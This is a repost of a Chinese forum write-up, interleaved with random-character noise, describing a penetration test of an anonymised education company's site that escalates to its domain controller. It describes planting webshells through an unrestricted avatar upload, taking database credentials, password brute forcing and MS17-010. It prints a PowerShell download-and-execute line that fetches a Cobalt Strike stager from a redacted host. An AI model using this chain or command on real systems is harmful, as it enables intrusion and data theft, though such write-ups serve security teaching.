|
& p. w" L0 J, M# \' g; c' t% D
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
* {" E! k1 T8 ?2 ^$ }, K
) f1 p; d$ ]2 f( n& f$ T8 S/ a. e" g* i! @: j2 q, K' y' A
( v9 Y- F/ N0 S0 Q3 Y' ^& k4 ?
; R) R6 F' ^3 P1 Z$ u) m& B
. ]; ?- G1 Z$ t! g 正文: B. f7 Z/ ~6 P: q' \0 z
9 d; A* ]; d: W& e3 z% n* C3 p/ g1 j
: r7 P D% _/ w% t2 Z+ q4 \+ I ) N7 |, ]0 b0 C( O3 w3 ]" @
8 l+ k: ?/ s( P- ]3 i& O
目标:www.xxxx.com(一家教育机构)
- B/ @! r K& \5 b5 R打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能1 S* Z3 A1 {) d3 Q9 Z* V- }2 W- e% l) O1 b
. w$ b& V& O/ r2 c2 l" t; i& j6 T9 g `& H
 - u9 v% @8 _! f2 h D
- Z, ?0 [5 M8 R) k
2 M/ c6 @8 K) n4 r# U 进行了简单的信息搜集
! U$ X! b) y) d k+ t
* Z' \) U8 c; v+ e. d8 D! A9 q; C* J+ |+ @5 H
/ V9 j* O. \- d9 A% Z
& C7 D% G" p" E: U$ W; {0 J 子域名搜集0 k3 g5 \6 R% P) O* H
% ^, y& T& ]* Y' t. h8 c% V1 i% U% _$ P
 ! Q6 T; F# G$ Z! c3 c0 E0 E
8 B+ T. V: y( S8 z0 I5 _
% ^" K! m0 _9 ^; {8 A+ W fofa找资产
4 d% X. Q1 g/ D) X! ~' o c
' W6 r1 {! y, z7 G6 \; j5 a
0 A' Z. l' f" o/ f4 H) D9 d 8 O2 P$ Z4 B" L
0 w0 H5 c& P/ J- y 
7 E" W# O" o9 L% i/ ? 2 i/ e/ k. H8 U- j
, `+ v$ B* o/ {# y
一共七个资产。去重之后只有两个。
+ k3 g% E7 j- J9 G5 z
1 R3 _3 s& V, [: `' o
t% k' z$ g; n! `7 M, i
) u2 ?, N& K$ W0 Z+ p3 a
0 u5 w- U; `8 |1 d$ q0 e" { 目录探测/ E$ n3 |0 I6 e6 c
& e Q# M0 x: `
& V4 Z$ s8 Z0 X @& C7 s$ M" q  0 f+ S' n) h( m! F! _9 |
: C6 D: X8 U8 F+ L( I" E
o, {4 r1 H* M
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. g. r3 Q2 `; [4 j3 }
' c: F6 t7 ~/ X6 {. k) N. H! a0 L$ Q+ h
& a) \' B! _: Q- i $ H0 O. u8 E7 O0 Z* N* T
( R& C* F j- b& V# l 我又尝试了通过修改返回包来绕过登录界面$ u3 Z3 M" ]- s3 }$ D# E; j
# y7 S8 c- r* B4 `0 C" \& U- }4 U, m. L
! X! Q' s$ L" Q1 g Z& s ) m0 P& r! _: @$ D5 e$ n2 x1 _. b
8 P$ H' z* f) D" N 还是不行,尝试注入无果" R; Q: u; l$ i, a* @ P* _. B
& n" n7 p8 V# K7 }
6 q7 t+ b+ y5 Z 
Q8 k+ j% ?# S/ o
. t- |+ m. Q6 c, t
9 A7 _: p ^! Q: H3 G 不过我目录探测出了一处Spring信息泄露
- a. m% X( V7 y9 i, S# p
! w6 @# p8 i* S, B
$ t+ y5 @6 e. n: a, }% g
; p3 g: Q- U# j& e) e, L0 \
% O) d6 T; L$ R0 B  & ^2 q9 z1 e* E4 ^. }9 h
$ j- g9 F0 @- _% M
: z6 [! u$ V" v. y5 [
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 V( {# k& R0 P! L+ I! b
) q: e% b8 t0 I7 |( F5 |
$ l7 t* D6 `" d3 s+ V  * v) _* P1 @3 [
0 m; I! i( J2 ]* p3 P; N5 M9 L( d( B J* X ~% `1 z9 t7 W5 |
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。* u& l4 `0 E- m* f- ?& w
9 ?' v! S3 t2 G+ C: N8 G; y9 s
8 E$ D; T! u# j9 z( p 
- F) J& D5 x, [. b $ }- G4 I) }4 R7 h) [" J
3 s/ ~* x, e2 ^% e E* C# ]
获取有些师傅到这一步就手机抓包电脑测了。1 {4 ]/ ]8 M8 c5 n; y9 O' V
0 V# n+ t& a4 b) ~4 U8 g; k6 V
9 _* \3 [1 O0 B7 N8 ?4 Y- j Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
m9 w2 _9 H$ X0 O) P / w& @2 }: O4 y
3 E8 U$ B% X; }7 `: J2 {, G 其中在一个公众号发现了小程序,可以进行注册。7 A. m" b \8 |6 @+ n- I8 ^& Z
$ ~! t% L+ D5 h v
8 Y- Z0 g2 H! y1 M" C 看到了头像上传,尝试上传获取WebShell
@2 ?# P) t, Y+ e! {! M" k( B. Z ! q& ]1 k( ^" v+ z/ y
6 d, j# O4 n7 R% V; U3 s" L
 6 E7 d0 C; J G, L
`4 s( t; n+ M4 [/ {- @/ F3 z
% G( i8 W( P. F 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' W8 T; R2 U v$ T( n4 Z
4 X8 v+ Y" {8 L+ E& ^; e3 U1 _3 h2 B6 c+ k5 g3 t0 a" A/ s
3 b# j3 }& z2 S & `$ a$ P- }* Q* o* ]
, t( s& s7 r9 U. r, a! u+ b
然后上了大马
8 |" n* S/ e7 z+ f* h# G- D & y) V- F: g; Q4 o6 P5 }
( e4 E+ I, G( A$ }6 x' D! F0 ]  + Y" _ }& [; s8 K0 P% E; w
& ]( U4 D% l3 N& h* p1 Q) @2 R3 }9 w: r4 i0 C" n1 p1 a4 |
 : `! M( Z9 p# w3 N a& M
K; B# ?& R, S6 d
% }. D6 Q8 Q+ m% ~6 _
通过翻找文件发现数据库账号密码
W t- Y% B2 q7 B2 I5 v' U ' `3 U" E+ N; R& E5 t8 K& c* a
- [9 Y. a' x) ~ o
, U# t$ B4 j$ U* [- J* R% T ( H6 N$ j0 A$ y) Y2 E: i5 G. _
2 ?3 q( X, a p/ g --内网渗透/ F# `+ z0 Q3 } u7 K5 C
* j( E4 v: j, G% C9 k% E1 ^* J& I
直接通过powershell执行 cs上线( F4 d% P. j- @7 r, ]# ~( Y# ^# {0 g
( D( D* T: X! A5 f
& k, V; [7 K. F) k
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"* V7 y' D1 y# k* e3 X( B1 q
$ n K6 _ f* G7 T9 O/ z) Q8 a
- M5 M7 a1 r8 u% N9 A; o
8 d, @, k# Y3 k! H3 v" N3 T
7 H8 n% O/ U* f: o$ ~" f- J4 C
2 u* `" D6 B" J6 m2 L7 o4 B3 f 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
& S- |' C) g* l. @) e% i - G: t: N, n0 W( V
7 u" l7 d7 t& e- o* A$ C' G* F4 m, ^
 % N5 Z2 U$ ?( ~5 {/ ]3 o& _+ U
( y7 T! F; c2 m' t' E5 V0 k7 M5 ?! M6 x; ^1 v
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 B3 }& c" ]2 \
) V R( f2 ~" c$ \
. n6 M- j- u) r% Z) T2 |
' J8 z# `) U4 j' C5 \ 8 x3 k) |9 W4 _8 J$ y! Y
) Y, n: ^* u! ?
2 M2 O% W9 Q, {! x . f+ E$ ~4 R+ e1 `' l
' T* M* R7 i2 Y1 h
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" L w7 u# T6 @' E5 @( q* S2 e4 W
2 u. Z2 j, n, f0 u; P- z
. Q A( P' T, `4 i' K3 R5 w! U" R
( t' k, s5 x7 }2 D7 q' R4 z, }; ^4 _+ ^4 q0 N
 + U# [- I6 c+ a' F
9 Z; l# O. H4 R# s a; J5 l$ I9 l
% s0 t5 |, ]: H6 Q) x: e
o6 O$ m% k0 f5 V% Q
0 q# b6 A0 T1 k ?$ t/ \& T
( ^9 P( j- r) U! h. K
T& Z' g' Y) u2 q! U5 Q# i8 w! \: M, |8 E
W9 O s& m" D; G: h& Y, n4 F
+ p0 o! w; |6 u6 Z6 Q+ E+ [! q; ` g* U7 U: @( D+ c( o
小结
: D3 G( K" o3 Z6 R
( B2 u+ C2 y+ A. K& n, p
! ^+ @$ `. H" z. T ( s. ^$ [7 p8 I) |3 d( O9 c* u
T! E! R& P0 s) |) }$ }
0 x/ w) Q8 R+ J3 y# Q: ~8 b _5 A* { 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
9 N+ j- q2 j! V' r2 |: z4 y) e9 U
( l( W( U0 Y. I, {
$ r- C, Q2 y( o- t" e/ f
7 s9 K. H5 A1 C H1 r0 C, ] + l! p! b! e1 w3 N7 C7 H
+ N/ U& n- V ~& ~& |; X+ ?
- 8 d {1 } T4 V7 M# z v
( i/ k* M e: \0 L6 F" q6 j+ l& w
+ Z0 I' n+ r* _% \8 e
-
/ | K( x* x- d" Z5 Q" e" o
U9 m0 ?- v- |( D) `( U( ~
5 ], {. }4 R' m4 n
& {) g5 p+ s; E2 ?9 I8 ?
7 `3 D5 {: O+ Y* ~, ?" G U6 y
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html6 D% P J* ^/ G; ]) R( `1 p
$ D9 C+ U p/ M
" E6 G; e9 Q. N6 ^7 s
, O# a( a9 @) t | 
发表于 2024-3-1 19:41:32
收藏
支持
反对